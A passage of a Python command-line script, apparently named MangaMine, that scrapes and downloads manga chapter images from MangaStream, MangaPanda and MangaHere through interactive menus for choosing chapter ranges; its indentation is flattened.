if first_page_of_each_chapter == True:
first_page_of_each_chapter = False
numOfFileInCWD = len([name for name in os.listdir('.') if os.path.isfile(name)])
if numOfFileInCWD == Amount_of_pages:
break
image_file_name = image_file_name_list[j]
image_file_extension_list = re.findall(r'(\.\D[^\.]+)', image_file_name)
image_file_extension = image_file_extension_list[-1]
imageName = "Page " + str(j+1) + image_file_extension
print("Downloading Page %d" % (j+1), end="", flush=True)
print("\r", end="", flush=True)
fileExists = os.path.isfile(imageName)
#If file does not already exist, opens a file, writes image binary data to it and closes
if fileExists == False:
try:
rawImage = urllib.request.urlopen(image_file_name).read()
fout = open(imageName, 'wb')
fout.write(rawImage)
fout.close()
except:
print(' ')
print("Image download Error!")
print('Chapter ' + str(chapter_number) + ' Page ' + str(j+1) + ' Cannot be downloaded.')
elif type_two_manga == True:
#Get the pages between "<id..." and "</se..."
get_Pages = re.findall(r'id="page_select" onchange="window.location=this.value;">+(.*?)</select></li>', str(urllibHTML))
#There will be Two found
Pages_master_string = get_Pages[0]
#Get all page links. Second thing in list is an unneeded "selected" string. Loop to get rid
list_of_page_Links = re.findall(r'\"+(.*?)\"', Pages_master_string)
list_of_page_links_final = []
#Loop to rid of the "Selected" part of list
for j in range(len(list_of_page_Links)):
if list_of_page_Links[j] != "selected":
list_of_page_links_final.append(list_of_page_Links[j])
Amount_of_pages = len(list_of_page_links_final)
for j in range(len(list_of_page_links_final)):
try:
print("Downloading Page %d" % (j+1), end="", flush=True)
print("\r", end="", flush=True)
#Check for First page. Checks to see if anything is already downloaded
if first_page_of_each_chapter == True:
first_page_of_each_chapter = False
numOfFileInCWD = len([name for name in os.listdir('.') if os.path.isfile(name)])
if numOfFileInCWD == Amount_of_pages:
break
#At this point There will be something you need to download.
#Since we already have the HTML for the first page of EACH Chapter
#We dont need to waste time to read that again, set it here.
page_urllibHTML = urllibHTML
else:
page_urllibHTML = urllib.request.urlopen(list_of_page_links_final[j]).read()
#Get Image URL
image_file_name_list = re.findall(r'comic_page" style="max-width: 100%;" src="(.*?)"', str(page_urllibHTML))
image_file_name = image_file_name_list[0]
#CHECK EXTENSION. Bato.to Could use .png or .jpg or .jpeg
image_file_extension_list = re.findall(r'(\.\D[^\.]+)', image_file_name)
image_file_extension = image_file_extension_list[-1]
imageName = "Page " + str(j+1) + image_file_extension
fileExists = os.path.isfile(imageName)
#If file does not already exist, opens a file, writes image binary data to it and closes
if fileExists == False:
try:
rawImage = urllib.request.urlopen(image_file_name).read()
fout = open(imageName, 'wb')
fout.write(rawImage)
fout.close()
except:
print(' ')
print("Image download Error!")
print('Chapter ' + str(chapter_number) + ' Page ' + str(j+1) + ' Cannot be downloaded.')
except:
print("Invalid URL Error, or Connection Timeout!")
return
else:
print("Manga Type Error!")
return
while 1:
print('\n')
print('Do you wish to download another manga?[y/n]')
continueChoice = input('')
if continueChoice == 'y':
break
elif continueChoice == 'n':
success = True
break
else:
print('Invalid Option!')
#Main While Loop
#Download Manga If statement
#English chapters > 0
#Download manga Main statement where everything is performed in
return
def MangaPanda():
success = False
currentDirectory = os.getcwd()
downloadMangaListOnce = False
searchAgain = False
if platformType == 'Windows':
Search_feature_directory = currentDirectory + '\\Manga_Names_And_Links\\'
else:
Search_feature_directory = currentDirectory + '/Manga_Names_And_Links/'
Search_feature = os.path.isfile(Search_feature_directory + 'Manga_Database.txt')
while success == False:
downloadManga = True
if Search_feature:
search_url = Search_Feature(2, Search_feature_directory)
link_or_not = re.findall(r'(mangapanda.com)', search_url)
if len(link_or_not) == 0:
urlRequest = 'http://www.mangapanda.com' + search_url
else:
urlRequest = search_url
else:
print('The URL you are to input below should be the top level page of the')
print('manga you wish to download')
print('Ex: http://www.mangapanda.com/372/seto-no-hanayome.html ')
print('Please enter the url of the manga you wish to download (or q to quit): ')
urlRequest = input('')
print('\n')
#take the URL the user gave and cut off last five characters (.html)
try:
does_it_have_dot_html = re.findall(r'(\.html)', urlRequest)
if len(does_it_have_dot_html) == 0:
pass
else:
urlRequest = urlRequest[:-5]
urllibHTML = urllib.request.urlopen(urlRequest).read()
except:
print()
print('Invalid URL or connection timeout.')
downloadManga = False
#links to chapters on mangapanda are identified by the class 'chico_manga'
if downloadManga == True:
allChaps = re.findall(r'<div class="chico_manga"></div>\\n<a href="+(.*?)\">+', str(urllibHTML))
numOfChapLinks = len(allChaps)
#However the 6 most recent chapters are also under the 'chico_manga' class
#so it is necessary to pop those chapters off and if there are not a total
#of 6 chapters in the manga we have special cases
if numOfChapLinks < 12:
if numOfChapLinks == 10:
for i in range(5):
allChaps.pop(0)
elif numOfChapLinks == 8:
for i in range(4):
allChaps.pop(0)
elif numOfChapLinks == 6:
for i in range(3):
allChaps.pop(0)
elif numOfChapLinks == 4:
for i in range(2):
allChaps.pop(0)
elif numOfChapLinks == 2:
allChaps.pop(0)
else:
print('There was an error parsing the HTML!')
else:
for i in range(6):
allChaps.pop(0)
#Rather conveniently, there is a class called 'aname' which contains the name of the manga
grabName = re.findall(r'<h2 class="aname">+(.*?)\</h2>+', str(urllibHTML))
#some mangas contained characters in aname which cannot be used in windows directories
#these statements attempt to make said strings directory friendly
directorySafeName = grabName[0]
directorySafeName = directorySafeName.replace("/", " over ")
directorySafeName = directorySafeName.replace(":", "")
directorySafeName = directorySafeName.replace("?", "")
directorySafeName = directorySafeName.replace("+", "")
directorySafeName = directorySafeName.replace("\"","'")
directorySafeName = directorySafeName.replace("%", " Percent")
directorySafeName = directorySafeName.replace("<", "")
directorySafeName = directorySafeName.replace(">", "")
#since Windows and UNIX platforms use different directory syntax we need to know the platform
#and adjust accordingly
if platformType == 'Windows':
directoryName = currentDirectory + "\\MangaPanda\\" + str(directorySafeName)
else:
directoryName = currentDirectory + "/MangaPanda/" + str(directorySafeName)
try:
os.makedirs(directoryName)
except OSError:
if not os.path.isdir(directoryName):
raise
os.chdir(directoryName)
#loops chapter URLs to determine chapter number for both types of URLs
chapterNames = []
for i in range(len(allChaps)):
chapterNum = re.findall('((?:\d)+)', allChaps[i])
chapterNames.append(chapterNum[-1])
fullDownload = False
while 1:
customStart = False
customEnd = False
chapterFound = False
restartMenu = False
singleChapter = False
startLocation = 0
endLocation = 0
#asks the user if they want to download all the manga or start from a certain chapter
print('Do you wish to download the entire manga?[y/n]')
continueChoiceFullDownload = input('')
print()
if continueChoiceFullDownload == 'y':
fullDownload = True
break
elif continueChoiceFullDownload == 'n':
while 1:
print('Do you wish to start downloading from a certain chapter?[y/n]')
continueChoiceCustomChap = input('')
print()
if continueChoiceCustomChap == 'y':
print('Please enter the chapter you wish to start from.')
startChap = input('')
print()
for i in range(len(chapterNames)):
if startChap == chapterNames[i]:
chapterFound = True
customStart = True
startLocation = i
break
#this else is connected with the if in the for loop. If the for loop goes through all of its iterations
#and the if statement is never tripped then this else is tripped
else:
print("Invalid chapter number! Maybe the chapter is missing?")
print()
break
if chapterFound == True:
chapterFound = False
break
elif continueChoiceCustomChap == 'n':
restartMenu = True
break
elif continueChoiceCustomChap == 'q':
return
else:
print('Invalid Option!')
print()
elif continueChoiceFullDownload == 'q':
return
else:
print('Invalid Option!')
print()
if restartMenu == True:
break
if customStart == True:
break
#Inquires the user where they wish to end. If they do not specify the program will run to the last chapter
if fullDownload == False and restartMenu == False:
while 1:
print('Do you wish to end the download at a certain chapter?[y/n]')
print('Making the end location the same as the start location will download')
print('only that chapter')
print('Choosing [n]o will download the entire manga starting from the location')
print('you chose above')
continueChoiceCustomChap = input('')
print()
if continueChoiceCustomChap == 'y':
print('Please enter the chapter you wish to end at.')
endChap = input('')
print()
if int(endChap) < int(startChap):
print('Invalid chapter number! Your end chapter cannot be before the start!')
print()
else:
for i in range(len(chapterNames)):
if endChap == chapterNames[i]:
chapterFound = True
customEnd = True
endLocation = i
break
else:
print('Invalid chapter number! Maybe the chapter is missing?')
print()
if chapterFound == True:
break
elif continueChoiceCustomChap == 'n':
break
elif continueChoiceCustomChap == 'q':
return
else:
print('Invalid Option!')
print()
#once we have what chapters the user wants to download here the program modifies the chapter
#lists that will be passed to the main for-loop to download the chapters off MangaPanda
if customStart == True and customEnd == False:
for i in range(startLocation):
allChaps.pop(0)
chapterNames.pop(0)
elif customStart == True and customEnd == True:
for i in range(startLocation):
allChaps.pop(0)
chapterNames.pop(0)
for i in range(len(allChaps)-(int(endLocation)-int(startLocation))-1):
allChaps.pop(-1)
chapterNames.pop(-1)
if fullDownload == True or customStart == True:
for i in range(len(allChaps)):
if platformType == 'Windows':
chapDirectoryName = directoryName + "\\Chapter " + str(chapterNames[i])
else:
chapDirectoryName = directoryName + "/Chapter " + str(chapterNames[i])
try:
os.makedirs(chapDirectoryName)
except OSError:
if not os.path.isdir(chapDirectoryName):
raise
os.chdir(chapDirectoryName)
#There are some special cases associated with the first loop through the chapter
isFirstLoopPage = True
chapURL = "http://www.mangapanda.com" + allChaps[i]
print("Downloading Chapter", str(chapterNames[i]))
imageLocation = 0
while 1:
imageLocation += 1
#Looks at page URLs for any and all sequences of numbers
nextChapDetermine = re.findall('((?:\d)+)', chapURL)
try:
urllibHTML = urllib.request.urlopen(chapURL).read()
except:
print('Chapter URL Error. Cannot download Further.')
return
if isFirstLoopPage == True:
determineAmountOfPages = re.findall('<option value="+(.*?)\</option>', str(urllibHTML))
if len(determineAmountOfPages) == imageLocation - 1:
break
#Checks the number of files in directory in comparison to the number of images in the chapter
#If the number is the same the assumption is made that all images have been downloaded
if isFirstLoopPage == True:
isFirstLoopPage = False
numOfFileInCWD = len([name for name in os.listdir('.') if os.path.isfile(name)])
if numOfFileInCWD == len(determineAmountOfPages):
break
#grabs both the next page URL and the URL for the image on the current page
URLandIMG = re.findall(r'<div id="imgholder">+(.*?)\" name=+', str(urllibHTML))
nextPageURL = re.findall(r'<a href="+(.*?)\">', URLandIMG[0])
imageURL = re.findall(r'src="+(.*?)\"', URLandIMG[0])
extensionForIMG = re.findall('\.\D[^\.]+', imageURL[0])
imageName = "Page " + str(imageLocation) + extensionForIMG[-1]
fileExists = os.path.isfile(imageName)
#Old code that would put each page thats currently downloading on a new line
#print("Downloading Page", imageLocation)
#New code that will overwrite each "Downloading Page #" with the next page
#and will eventually be overwrote by the "Downloading Chapter #"
print("Downloading Page %d" % imageLocation, end="", flush=True)
print("\r", end="", flush=True)
#If file does not already exist, opens a file, writes image binary data to it and closes
if fileExists == False:
user_agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7'
url = imageURL[0]
headers={'User-Agent':user_agent,}
request = urllib.request.Request(imageURL[0],None,headers)
try:
rawImage = urllib.request.urlopen(request).read()
fout = open(imageName, 'wb')
fout.write(rawImage)
fout.close()
except:
print(' ')
print("Image download Error!")
print('Chapter ' + str(chapterNames[i]) + ' Page ' + str(imageLocation) + ' Cannot be downloaded.')
chapURL = "http://www.mangapanda.com" + nextPageURL[0]
while 1:
print('Do you wish to download another manga?[y/n]')
continueChoice = input('')
print()
if continueChoice == 'y':
break
elif continueChoice == 'n':
success = True
break
elif continueChoice == 'q':
return
else:
print('Invalid Option!')
return
def MangaHere():
success = False
Search_feature = False
currentDirectory = os.getcwd()
if platformType == 'Windows':
Search_feature_directory = currentDirectory + '\\Manga_Names_And_Links\\'
else:
Search_feature_directory = currentDirectory + '/Manga_Names_And_Links/'
Search_feature = os.path.isfile(Search_feature_directory + 'Manga_Database.txt')
if platformType == 'Windows':
directoryName = currentDirectory + "\\MangaHere"
else:
directoryName = currentDirectory + "/MangaHere"
try:
os.makedirs(directoryName)
except OSError:
if not os.path.isdir(directoryName):
raise
os.chdir(directoryName)
#downloadMangaListOnce = False
downloadManga = False
while 1:
if Search_feature:
while True:
search_url = Search_Feature(3, Search_feature_directory)
try:
urllibHTML = urllib.request.urlopen(search_url).read()
downloadManga = True
break
except:
print()
print('Invalid URL or connection Timeout')
print('Please Try Again')
else:
print('The URL you are to input below should be the top level page of the')
print('manga you wish to download')
print('Ex: http://www.mangahere.co/manga/seto_no_hanayome/ ')
print()
while True:
print('Please enter the url of the manga you wish to download (or q to quit): ')
urlRequest = input('')
print('\n')
if urlRequest == 'q':
return
try:
urllibHTML = urllib.request.urlopen(urlRequest).read()
downloadManga = True
break
except:
print()
print('Invalid URL or connection Timeout')
if downloadManga == True:
allChaps = re.findall(r' <a class="color_0077" href="(.*?)"', str(urllibHTML))
allChaps.reverse()
numOfChapLinks = len(allChaps)
mangaName = re.findall(r' <h1 class="title"><span class="title_icon"></span>(.*?)</h1>', str(urllibHTML))
try:
directorySafeName = mangaName[0]
except:
print('Invalid URL!')
return
#Python 3.4 Converts '&' Type things to their string equivalent.
directorySafeName = html.unescape(directorySafeName)
#Get rid of Non-Functioning characters for Filenames
directorySafeName = directorySafeName.replace("/", " over ")
directorySafeName = directorySafeName.replace(":", "")
directorySafeName = directorySafeName.replace("?", "")
directorySafeName = directorySafeName.replace("+", " plus ")
directorySafeName = directorySafeName.replace("\"","'")
directorySafeName = directorySafeName.replace("%", " Percent ")
directorySafeName = directorySafeName.replace("<", "")
directorySafeName = directorySafeName.replace(">", "")
directorySafeName = re.sub(r'\\x\w{2}', r' ', directorySafeName)
directorySafeName = re.sub(r"\\'", r"'", directorySafeName)
directorySafeName = directorySafeName.title()
# Add in options here
search_found_bool = False
search_quit_bool = False
fullDownload = False
custom_start = False
custom_end = False
place_to_start_from_index = 0
place_to_end_at_index = 0
while True:
search_found_bool = False
search_quit_bool = False
fullDownload = False
custom_start = False
custom_end = False
place_to_start_from_index = 0
place_to_end_at_index = 0
print('Do you wish to download the entire manga? [y/n] or [q] to quit.')
continueChoiceFullDownload = input('')
print('\n')
if continueChoiceFullDownload == 'n':
print('Here is a list of the first 50 Chapters.')
print('Keep in mind you cannot go back')
print('\tYour options are:')
print('The number of the chapter you want to start a')
print('\'n\' for the next 50 chapters')
print('\'q\' to quit to the main menu\n')
for i in range(len(allChaps)):
#This code block is to extract the Vol and Chapter numbers
#From the URL. It is a pain but needed.
#This code block is also used later on.
skipBool1 = False
skipBool2 = False
volChapDirectoryString = ""
findVolume = re.findall(r'v\d{2}.\d+' , allChaps[i])
findChap = re.findall(r'c\d{3}.\d+' , allChaps[i])
if len(findVolume) == 0:
findVolume = re.findall(r'v\d{2}', allChaps[i])
try:
volTempString = re.findall(r'\d{2}', findVolume[0])
except:
skipBool1 = True
if skipBool1 == False:
volTempString = str(int(volTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Vol. ' + volTempString + ' '
else:
volTempString = re.findall(r'\d{2}.\d+', findVolume[-1])
volTempString = str(float(volTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Vol. ' + volTempString + ' '
if len(findChap) == 0:
findChap = re.findall(r'c\d{3}', allChaps[i])
try:
chapTempString = re.findall(r'\d{3}', findChap[0])
except:
skipBool2 = True
if skipBool2 == False:
chapTempString = str(int(chapTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Chap. ' + chapTempString
else:
chapTempString = re.findall(r'\d{3}.\d+', findChap[-1])
chapTempString = str(float(chapTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Chap. ' + chapTempString
if volChapDirectoryString == "":
print('An error has occured getting chapter or volume number!')
return
#Plus one here So there will be a minus one later!!!
print('Number ' + str(i+1) + ' ' + volChapDirectoryString)
if i % 50 == 49 or (i == (len(allChaps) - 1)):
print('\nYour options are:')
print('The number of the manga you want')
print('\'n\' for the next 50 names')
print('\'q\' to quit to the main menu\n')
while True:
print('Choose:')
search_input = input('')
print('\n')
if search_input.isdigit():
if int(search_input) > 0 and int(search_input) <= len(allChaps):
custom_start = True
place_to_start_from_index = (int(search_input) - 1) #Subtract one for the option before
search_found_bool = True
break
else:
length_of_list = len(allChaps)
print('Your choice needs to be greater then 0 and less then ' + str(int(length_of_list)+1))
elif search_input == 'n':
print('\nThe next 50 manga:\n')
break
elif search_input == 'q':
search_quit_bool = True
break
elif search_input == 'l':
print('\nYour options are:')
print('The number of the manga you want')
print('\'n\' for the next 50 names')
print('\'q\' to quit to the main menu\n')
else:
print('Invalid choice!')
print()
if search_found_bool:
break
if search_quit_bool:
break
#If there was something found and the user wants to end at a chapter
#If the user quit than this will just loop back to the begining of the menu
if search_found_bool:
search_found_bool = False
search_quit_bool = False
while 1:
print('Do you wish to end the download at a certain chapter?[y/n] or [q] to quit.')
print('By Choosing no the entire manga will download from the start location')
continueChoiceCustomChap = input('')
print('\n')
if continueChoiceCustomChap == 'y':
while True:
print('Here is a list of the first 50 Chapters.')
print('Keep in mind you cannot go back')
print('You must select a number equal to or greater than ' + str(place_to_start_from_index))
print('\tYour options are:')
print('The number of the chapter you want to start a')
print('\'n\' for the next 50 chapters')
print('\'q\' to quit and download until the end of the manga\n')
for i in range(len(allChaps)):
#This code block is to extract the Vol and Chapter numbers
#From the URL. It is a pain but needed.
#This code block is also used later on.
skipBool1 = False
skipBool2 = False
volChapDirectoryString = ""
findVolume = re.findall(r'v\d{2}.\d+' , allChaps[i])
findChap = re.findall(r'c\d{3}.\d+' , allChaps[i])
if len(findVolume) == 0:
findVolume = re.findall(r'v\d{2}', allChaps[i])
try:
volTempString = re.findall(r'\d{2}', findVolume[0])
except:
skipBool1 = True
if skipBool1 == False:
volTempString = str(int(volTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Vol. ' + volTempString + ' '
else:
volTempString = re.findall(r'\d{2}.\d+', findVolume[-1])
volTempString = str(float(volTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Vol. ' + volTempString + ' '
if len(findChap) == 0:
findChap = re.findall(r'c\d{3}', allChaps[i])
try:
chapTempString = re.findall(r'\d{3}', findChap[0])
except:
skipBool2 = True
if skipBool2 == False:
chapTempString = str(int(chapTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Chap. ' + chapTempString
else:
chapTempString = re.findall(r'\d{3}.\d+', findChap[-1])
chapTempString = str(float(chapTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Chap. ' + chapTempString
if volChapDirectoryString == "":
print('An error has occured getting chapter or volume number!')
return
#Plus one here So there will be a minus one later!!!
print('Number ' + str(i+1) + ' ' + volChapDirectoryString)
if i % 50 == 49 or (i == (len(allChaps) - 1)):
print('\nYour options are:')
print('The number of the manga you want')
print('\'n\' for the next 50 names')
print('\'q\' to quit and download until the end of the manga\n')
while True:
print('Choose:')
search_input = input('')
print('\n')
if search_input.isdigit():
if int(search_input) >= (place_to_start_from_index + 1) and int(search_input) <= len(allChaps):
custom_end = True
place_to_end_at_index = (int(search_input) - 1) #Subtract one for the option before
search_found_bool = True
break
else:
length_of_list = len(allChaps)
print('Your choice needs to be greater then ' + str(place_to_start_from_index + 1) + ' and less then ' + str(int(length_of_list)+1))
elif search_input == 'n':
print('\nThe next 50 manga:\n')
break
elif search_input == 'q':
search_quit_bool = True
break
elif search_input == 'l':
print('\nYour options are:')
print('The number of the manga you want')
print('\'n\' for the next 50 names')
print('\'q\' to quit and download until the end of the manga\n')
else:
print('Invalid choice!')
print()
if search_found_bool:
break
if search_quit_bool:
break
if custom_start or custom_end:
break
if custom_start or custom_end:
break
elif continueChoiceCustomChap == 'n':
break
elif continueChoiceCustomChap == 'q':
return
else:
print('Invalid Option!')
#At this point There is a gurenteed start
#There may be an end chapter but if the user quit than custom_end will be false
#and the manga will download from the start until absolute end of manga
break
else:
print('No chapter Detected. Please try again.\n\n')
#After if statement
elif continueChoiceFullDownload == 'y':
fullDownload = True
break
elif continueChoiceFullDownload == 'q':
return
else:
print('Invalid Option!')
#
#
if fullDownload == True:
pass
#If you only have a start location, pop off chapter numbers/links until you hit that chapter
elif custom_start == True and custom_end == False:
for i in range(place_to_start_from_index):
allChaps.pop(0)
#Do same As before But will need to pop off end as well
#I found it easier to reverse then do down the list in decending order
#And pop off from begining until the end chapter is reached.
#Then reverse again.
elif custom_start == True and custom_end == True:
for i in range(place_to_start_from_index):
allChaps.pop(0)
for i in range(len(allChaps)-(int(place_to_end_at_index)-int(place_to_start_from_index))-1):
allChaps.pop(-1)
else:
print('Fatal error with the start selection')
return
#
if platformType == 'Windows':
directoryName = directoryName + "\\" + directorySafeName
else:
directoryName = directoryName + "/" + directorySafeName
try:
os.makedirs(directoryName)
except OSError:
if not os.path.isdir(directoryName):
raise
os.chdir(directoryName)
for i in allChaps:
skipBool1 = False
skipBool2 = False
firstLoop = True
currentPage = 0
volChapDirectoryString = ""
findVolume = re.findall(r'v\d{2}.\d+' , i)
findChap = re.findall(r'c\d{3}.\d+' , i)
if len(findVolume) == 0:
findVolume = re.findall(r'v\d{2}', i)
try:
volTempString = re.findall(r'\d{2}', findVolume[0])
except:
skipBool1 = True
if skipBool1 == False:
volTempString = str(int(volTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Vol. ' + volTempString + ' '
else:
volTempString = re.findall(r'\d{2}.\d+', findVolume[-1])
volTempString = str(float(volTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Vol. ' + volTempString + ' '
if len(findChap) == 0:
findChap = re.findall(r'c\d{3}', i)
try:
chapTempString = re.findall(r'\d{3}', findChap[0])
except:
skipBool2 = True
if skipBool2 == False:
chapTempString = str(int(chapTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Chap. ' + chapTempString
else:
chapTempString = re.findall(r'\d{3}.\d+', findChap[-1])
chapTempString = str(float(chapTempString[0]))
volChapDirectoryString = volChapDirectoryString + 'Chap. ' + chapTempString
if volChapDirectoryString == "":
print('An error has occured getting chapter or volume number!')
return
print('Downloading', volChapDirectoryString)
if platformType == 'Windows':
volChapDirectoryName = directoryName + "\\" + volChapDirectoryString
else:
volChapDirectoryName = directoryName + "/" + volChapDirectoryString
try:
os.makedirs(volChapDirectoryName)
except OSError:
if not os.path.isdir(volChapDirectoryName):
raise
os.chdir(volChapDirectoryName)
urllibIMG = str(urllib.request.urlopen(i).read())
trimHTML = re.findall('<select id="top_chapter_list"(.*?)read_img', urllibIMG)
try:
allPageURLs = re.findall('<option value="(.*?)" ', trimHTML[-1])
except:
print('Something went wrong when trying to find the page URL\'s!')
print('This manga cannot be downloaded at this time.')
return
for k in allPageURLs:
currentPage += 1
skipPage = False
if firstLoop == False:
#urllibReq = urllib.request.Request(k, None, {}, None, True,'POST')
urllibReq = urllib.request.Request(k)
urllibReq.method = 'POST'
urllibIMG = str(urllib.request.urlopen(urllibReq).read())
if firstLoop == True:
firstLoop = False
numOfFileInCWD = len([name for name in os.listdir('.') if os.path.isfile(name)])
if numOfFileInCWD == len(allPageURLs):
break
print("Downloading Page %d" % currentPage, end="", flush=True)
print("\r", end="", flush=True)
#textFile = open("HTMLFile " + str(currentPage) + ".HTML", "w")
#textFile.write(urllibIMG)
#textFile.close()
imageURL = re.findall('<img src="(.*?)" onerror="', urllibIMG)
try:
extensionForIMG = re.findall('\.[a-z]{3}', imageURL[0])
except:
print('Page ' + str(currentPage) + ' could not be downloaded!')
skipPage = True
if skipPage == False:
imageName = "Page " + str(currentPage) + extensionForIMG[-1]
fileExists = os.path.isfile(imageName)
if fileExists == False:
try:
rawImage = urllib.request.urlopen(imageURL[0]).read()
fout = open(imageName, 'wb')
fout.write(rawImage)
fout.close()
except:
print(' ')
print("Image download Error!")
print('Volume/Chapter: ' + volChapDirectoryString + ' Page: ' + str(currentPage) + ' Cannot be downloaded.')
while True:
print('Do you want to download another manga from MangaHere?')
print('[y/n]')
Continue_or_not = input('')
if Continue_or_not == 'y':
break
elif Continue_or_not == 'n':
return
else:
print('Invalid choice!')
print()
return
def MangaStream():
success = False
currentDirectory = os.getcwd()
if platformType == 'Windows':
MASTERdirectoryName = currentDirectory + "\\MangaStream"
else:
MASTERdirectoryName = currentDirectory + "/Mangastream"
try:
os.makedirs(MASTERdirectoryName)
except OSError:
if not os.path.isdir(MASTERdirectoryName):
raise
#MASTERdirectoryName is the Variable that will keep the program downloading
#Different Manga to the same Mangastream Folder
os.chdir(MASTERdirectoryName)
while success == False:
downloadManga = False
print('To download from MangaStream you must input a URL.')
print('The URL you are to input below should be the top level page of the')
print('manga you wish to download')
print('Ex: http://mangastream.com/manga/one_piece ')
print()
print('Please enter the url of the manga you wish to download (or q to quit): ')
urlRequest = input('')
print('\n')
if urlRequest == 'q':
return
try:
urllibHTML = urllib.request.urlopen(urlRequest).read()
downloadManga = True
except:
print()
print('Invalid URL or connection time-out.')
if downloadManga == True:
Manga_Title = re.findall(r'<title>(.*?) Manga', str(urllibHTML))
if len(Manga_Title) == 0:
print("Title not found. URL or HTML Error.")
break
Manga_Title_string = Manga_Title[0]
Manga_Title_string = re.sub(r'\\x\w{2}', r' ', Manga_Title_string)
#Python 3.4 Converts '&' Type things to their string equivelant.
Manga_Title_string = html.unescape(Manga_Title_string)
#Get rid of Non-Functioning characters for Filenames
directorySafeName = Manga_Title_string
directorySafeName = directorySafeName.replace("/", " over ")
directorySafeName = directorySafeName.replace(":", "")
directorySafeName = directorySafeName.replace("?", "")
directorySafeName = directorySafeName.replace("+", " plus ")
directorySafeName = directorySafeName.replace("\"","'")
directorySafeName = directorySafeName.replace("%", " Percent ")
directorySafeName = directorySafeName.replace("<", "")
directorySafeName = directorySafeName.replace(">", "")
Manga_Title_string = directorySafeName
all_chaps_list = re.findall('<th style="width: 70%">Chapter<\/th>\\\\n<th style="width: 30%">Released<\/th>\\\\n<\/tr>\\\\n<tr>\\\\n(.*?)<\/table>', str(urllibHTML), re.DOTALL)
all_chaps_str = all_chaps_list[0]
chapter_list_tuples = re.findall(r'href="(.*?)">(.*?)</a>', str(all_chaps_str))
chapter_names = []
chapter_links = []
for i in range(len(chapter_list_tuples)):
chapter_links.append(chapter_list_tuples[i][0])
chapter_names.append(chapter_list_tuples[i][1])
#Start Manga Downloading
currentDirectory = MASTERdirectoryName
if platformType == 'Windows':
manga_directory_name = currentDirectory + "\\" + Manga_Title_string
else:
manga_directory_name = currentDirectory + "/" + Manga_Title_string
try:
os.makedirs(manga_directory_name)
except OSError:
if not os.path.isdir(manga_directory_name):
raise
os.chdir(manga_directory_name)
for i in range(len(chapter_names)):
first_chapter_bool = True
chapter_link_string = chapter_links[i]
chapter_name_string = chapter_names[i]
chapDirectoryName = ''
chapter_name_string = re.sub(r'\\x\w{2}', r' ', chapter_name_string)
#Python 3.4 Converts '&' Type things to their string equivelant.
#chapter_name_string = html.unescape(chapter_name_string)
#Get rid of Non-Functioning characters for Filenames
directorySafeName = chapter_name_string
directorySafeName = directorySafeName.replace("/", " over ")
directorySafeName = directorySafeName.replace(":", "")
directorySafeName = directorySafeName.replace("?", "")
directorySafeName = directorySafeName.replace("+", " plus ")
directorySafeName = directorySafeName.replace("\"", "'")
directorySafeName = directorySafeName.replace("\'", "'")
directorySafeName = directorySafeName.replace("\\'", "'")
directorySafeName = directorySafeName.replace("\\", "")
directorySafeName = directorySafeName.replace("%", " Percent ")
directorySafeName = directorySafeName.replace("<", "")
directorySafeName = directorySafeName.replace(">", "")
chapter_name_string = directorySafeName
if platformType == 'Windows':
chapDirectoryName = manga_directory_name + "\\Chapter " + chapter_name_string
else:
chapDirectoryName = manga_directory_name + "/Chapter " + chapter_name_string
try:
os.makedirs(chapDirectoryName)
except OSError:
if not os.path.isdir(chapDirectoryName):
raise
os.chdir(chapDirectoryName)
print("Downloading Chapter", chapter_name_string)
try:
urllibHTML = urllib.request.urlopen(chapter_link_string).read()
except:
print('Chapter Link Request Failed.')
print('HTML/Site Error')
return
page_list_raw = re.findall(r'<ul class="dropdown-menu">(.*?)</ul>', str(urllibHTML), re.DOTALL)
page_list_string = page_list_raw[-1]
list_of_some_of_the_pages = re.findall(r'href="(.*?)">', str(page_list_string))
final_page = list_of_some_of_the_pages[-1]
number_of_pages_list = re.findall(r'http://readms.com/r/.*?/\S+/\S+/(\d+)', final_page)
number_of_pages = int(number_of_pages_list[0])
chapter_url_list = re.findall(r'(http://readms.com/r/.*?/\S+/\S+/)\d+', final_page)
chapter_url = chapter_url_list[0]
for j in range(number_of_pages):
if j == 0:
numOfFileInCWD = len([name for name in os.listdir('.') if os.path.isfile(name)])
if numOfFileInCWD == number_of_pages:
break
print("Downloading Page %d" % (j+1), end="", flush=True)
print("\r", end="", flush=True)
if first_chapter_bool:
first_chapter_bool = False
page_urllibHTML = urllibHTML
else:
try:
page_urllibHTML = urllib.request.urlopen(chapter_url + str(j+1)).read()
except:
print('Page link Request Failed.')
print('HTML/Site Error')
image_file_name_list = re.findall(r'<img id="manga-page" src="(.*?)"/></a>', str(page_urllibHTML))
image_file_name = image_file_name_list[0]
#CHECK EXTENSION. Mangastream Could use .png or .jpg or .jpeg
image_file_extension_list = re.findall(r'(\.\D[^\.]+)', image_file_name)
image_file_extension = image_file_extension_list[-1]
imageName = "Page " + str(j+1) + image_file_extension
fileExists = os.path.isfile(imageName)
#If file does not already exist, opens a file, writes image binary data to it and closes
if fileExists == False:
try:
rawImage = urllib.request.urlopen(image_file_name).read()
fout = open(imageName, 'wb')
fout.write(rawImage)
fout.close()
except:
print('Image download Request Failed.')
print('HTML/Site Error')
print('Image skipped to next image/page\n')
while 1:
print('\n')
print('Do you wish to download another manga?[y/n]')
continueChoice = input('')
if continueChoice == 'y':
break
elif continueChoice == 'n':
success = True
break
else:
print('Invalid Option!')
return
def Main():
print('\t\tWelcome to MangaMine!')
site_input = 'y'
MAIN_currentDirectory = os.getcwd()
while True:
if site_input == 'y':
print('Which manga site do you want to download from?')
print('Choose a number:', end='\n\n')
print('1. MangaStream')
print('2. MangaPanda')
print('3. MangaHere', end='\n\n')
#print('4. Batoto', end='\n\n')
while True:
site_input = input()
print()
if site_input == '1':
MangaStream()
break
elif site_input == '2':
MangaPanda()
break
elif site_input == '3':
MangaHere()
break
#elif site_input == '4':
# Batoto()
# break
else:
print('Invalid Input.')
